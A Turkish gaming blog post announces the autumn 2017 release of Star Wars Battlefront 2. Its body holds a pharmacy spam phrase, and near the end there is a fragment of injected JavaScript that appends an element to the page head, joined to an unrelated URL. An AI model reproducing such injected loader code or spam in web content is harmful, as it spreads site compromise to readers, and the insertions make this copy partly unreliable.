Star Wars Battlefront 2 Çıkıyor

Oyun severler tarafından merakla beklenen Star Wars Battlefront 2 oyununun çıkış tarihi sonunda kullanıcılara duyuruldu. Electronic Arts yönetimi tarafından yapılan açıklamaya göre 2017 yılında oyunun çıkacağı duyuruldu.

lipothin no rx

star-wars-battlefront-2Hatırlacağınız üzere Star Wars Battlefront oyunu 2015 yılının soy aylarına doğru çıkmıştı ve 14 milyonu aşan bir satış rekoruna ulaşmıştı. Elde edilen bu rakam Electronic Arts yöneticileri tarafından oldukça olumlu karşılanmıştı. Oyuncuların yoğun ilgi göstermesi üzerine yapımcılar tarafından Star Wars Battlefront 2’nin yapım aşamasında olduğu belirtilmiş ve beklentiler karşılanmaya çalışılmıştır. Blake Jorgensen yapmış olduğu açıklamada; çıkış tarihi olarak 2017 yılının sonbahar aylarını işaret etmiştir. Bu gelişme üzerine kullanıcıların tamamı 2017 sonbaharında çıkacak olan oyunun tarihini sabırsızlıkla bekliyor. Yeni olarak ikisi çıkacak oyunda grafiklerin kalitesi ve haritaların büyüklüğü ile oyun severlerin etkileneceği yönünde söylentiler şimdiden mevcut.

Oyun içerisinde de ciddi ölçüde farklılıklar bulunmaktadır. Oyunun ilk serinde hatırlayacağınız üzere Starwarz gezegen olaylarına değinilmişti. İkincisi çıkan oyunda ise yeni filmlerden olaylar alınmış ve buna göre kurgulanmıştır.

2017 yılında oyun çıktığında sizlere inceleme yaparak daha detaylı bilgiler aktarmamız dileğiyle.

d.getElementsByTagName(‘head’)[0].appendChild(s);http://cutlerfirm.com/site/archives/1274/

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir